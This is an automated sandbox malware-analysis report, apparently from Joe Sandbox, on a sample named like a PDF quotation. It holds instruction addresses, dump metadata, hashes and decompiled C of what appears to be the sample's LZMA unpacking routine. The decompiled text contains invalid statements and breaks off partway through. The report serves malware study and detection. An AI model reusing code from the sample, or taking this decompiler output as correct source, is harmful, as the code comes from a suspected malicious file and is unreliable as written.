                0x00406276
                0x00406279
                0x0040627f
                0x00406281
                0x00406281
                0x00406281
                0x00406284
                0x00406287
                0x00406287
                0x0040628d
                0x0040622b
                0x0040622b
                0x0040622e
                0x00000000
                0x0040622e
                0x0040628f
                0x0040628f
                0x00406292
                0x00406295
                0x00406298
                0x0040629b
                0x0040629e
                0x004062a1
                0x004062a4
                0x004062a7
                0x004062aa
                0x004062ad
                0x004062c5
                0x004062c8
                0x004062cb
                0x004062ce
                0x004062ce
                0x004062d1
                0x004062d5
                0x004062d7
                0x004062af
                0x004062af
                0x004062b7
                0x004062bc
                0x004062be
                0x004062c0
                0x004062c0
                0x004062da
                0x004062e1
                0x004062e4
                0x00000000
                0x004062e6
                0x004062e6
                0x00000000
                0x004062e6
                0x00000000
                0x00406573
                0x00406573
                0x00406577
                0x0040689e
                0x0040689e
                0x00000000
                0x0040689e
                0x0040657d
                0x0040657d
                0x00406580
                0x00406583
                0x00406587
                0x0040658a
                0x00406590
                0x00406592
                0x00406592
                0x00406592
                0x00406595
                0x00000000
                0x00000000
                0x00406343
                0x00406343
                0x00406346
                0x00000000
                0x00000000
                0x00406682
                0x00406682
                0x00406686
                0x004066a8
                0x004066a8
                0x004066ab
                0x004066b5
                0x004066b8
                0x004066b8
                0x00000000
                0x004066b8
                0x00406688
                0x00406688
                0x0040668b
                0x0040668f
                0x00406692
                0x00406692
                0x00406695
                0x00000000
                0x00000000
                0x0040673f
                0x0040673f
                0x00406743
                0x00406761
                0x00406761
                0x00406761
                0x00406761
                0x00406768
                0x0040676f
                0x00406776
                0x00406776
                0x0040677d
                0x00406780
                0x00406787
                0x00000000
                0x0040678a
                0x00406745
                0x00406745
                0x00406748
                0x0040674b
                0x0040674e
                0x00406755
                0x00406699
                0x00406699
                0x0040669c
                0x00000000
                0x00000000
                0x00406830
                0x00406830
                0x00406833
                0x00406734
                0x00406734
                0x00406734
                0x00000000
                0x0040673a
                0x00000000
                0x0040646a
                0x0040646a
                0x0040646c
                0x00406473
                0x00406474
                0x00406476
                0x00406479
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040677d
                0x0040677d
                0x00406780
                0x00406787
                0x00000000
                0x0040678a
                0x00000000
                0x00000000
                0x00000000
                0x004064af
                0x004064af
                0x004064b2
                0x004064e8
                0x004064e8
                0x00406618
                0x00406618
                0x00406618
                0x00406618
                0x0040661b
                0x0040661b
                0x0040661e
                0x00406620
                0x004068aa
                0x004068aa
                0x00000000
                0x004068aa
                0x00406626
                0x00406626
                0x00406629
                0x00000000
                0x00000000
                0x0040662f
                0x0040662f
                0x00406633
                0x00406636
                0x00406636
                0x00406636
                0x00000000
                0x00406636
                0x004064b4
                0x004064b4
                0x004064b6
                0x004064b8
                0x004064ba
                0x004064bd
                0x004064be
                0x004064c0
                0x004064c2
                0x004064c5
                0x004064c8
                0x004064de
                0x004064de
                0x004064e3
                0x0040651b
                0x0040651b
                0x0040651f
                0x00406548
                0x0040654b
                0x0040654d
                0x00406554
                0x00406557
                0x0040655a
                0x0040655a
                0x0040655f
                0x0040655f
                0x00406561
                0x00406564
                0x0040656b
                0x0040656e
                0x0040659b
                0x0040659b
                0x0040659e
                0x004065a1
                0x00406615
                0x00406615
                0x00406615
                0x00406615
                0x00000000
                0x00406615
                0x004065a3
                0x004065a3
                0x004065a9
                0x004065ac
                0x004065af
                0x004065b2
                0x004065b5
                0x004065b8
                0x004065bb
                0x004065be
                0x004065c1
                0x004065c4
                0x004065dd
                0x004065df
                0x004065e2
                0x004065e3
                0x004065e6
                0x004065e8
                0x004065eb
                0x004065ed
                0x004065ef
                0x004065f2
                0x004065f4
                0x004065f7
                0x004065fb
                0x004065fd
                0x004065fd
                0x004065fe
                0x00406601
                0x00406604
                0x004065c6
                0x004065c6
                0x004065ce
                0x004065d3
                0x004065d5
                0x004065d8
                0x004065d8
                0x00406607
                0x0040660e
                0x00406598
                0x00406598
                0x00406598
                0x00406598
                0x00000000
                0x00406610
                0x00406610
                0x00000000
                0x00406610
                0x0040660e
                0x00406521
                0x00406521
                0x00406524
                0x00406526
                0x00406529
                0x0040652c
                0x0040652f
                0x00406531
                0x00406534
                0x00406537
                0x00406537
                0x0040653a
                0x0040653a
                0x0040653d
                0x00406544
                0x00406518
                0x00406518
                0x00406518
                0x00406518
                0x00000000
                0x00406546
                0x00406546
                0x00000000
                0x00406546
                0x00406544
                0x004064ca
                0x004064ca
                0x004064cd
                0x004064cf
                0x004064d2
                0x00000000
                0x00000000
                0x00406231
                0x00406231
                0x00406235
                0x0040687a
                0x0040687a
                0x00000000
                0x0040687a
                0x0040623b
                0x0040623b
                0x0040623e
                0x00406241
                0x00406244
                0x00406247
                0x0040624a
                0x0040624d
                0x0040624f
                0x00406252
                0x00406255
                0x00406258
                0x0040625a
                0x0040625a
                0x0040625a
                0x00000000
                0x00000000
                0x004063bc
                0x004063bc
                0x004063c0
                0x00406886
                0x00406886
                0x00000000
                0x00406886
                0x004063c6
                0x004063c6
                0x004063c9
                0x004063cc
                0x004063cf
                0x004063d1
                0x004063d1
                0x004063d1
                0x004063d4
                0x004063d7
                0x004063da
                0x004063dd
                0x004063e0
                0x004063e3
                0x004063e4
                0x004063e6
                0x004063e6
                0x004063e6
                0x004063e9
                0x004063ec
                0x004063ef
                0x004063f2
                0x004063f2
                0x004063f2
                0x004063f5
                0x004063f7
                0x004063f7
                0x00000000
                0x00000000
                0x00406639
                0x00406639
                0x00406639
                0x0040663d
                0x00000000
                0x00000000
                0x00406643
                0x00406643
                0x00406646
                0x00406649
                0x0040664c
                0x0040664e
                0x0040664e
                0x0040664e
                0x00406651
                0x00406654
                0x00406657
                0x0040665a
                0x0040665d
                0x00406660
                0x00406661
                0x00406663
                0x00406663
                0x00406663
                0x00406666
                0x00406669
                0x0040666c
                0x0040666f
                0x00406672
                0x00406676
                0x00406678
                0x0040667b
                0x00000000
                0x0040667d
                0x0040667d
                0x004063fa
                0x004063fa
                0x00000000
                0x004063fa
                0x0040667b
                0x004068b0
                0x004068b0
                0x00000000
                0x00000000
                0x00405edf
                0x004068e7
                0x004068e7
                0x00000000
                0x004068e7
                0x00406734
                0x004067b4
                0x0040677d

                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                • Instruction ID: 5ae99ca79f71cc2638d3baaeb57d6c4ee888c8cbc78e3ce5cc4ffc2d3191f51a
                • Opcode Fuzzy Hash: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                • Instruction Fuzzy Hash: 1FA13571D00229CBDF28CFA8C854BADBBB1FF44305F15816AD816BB281D7785A86DF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406682, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E00406682() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
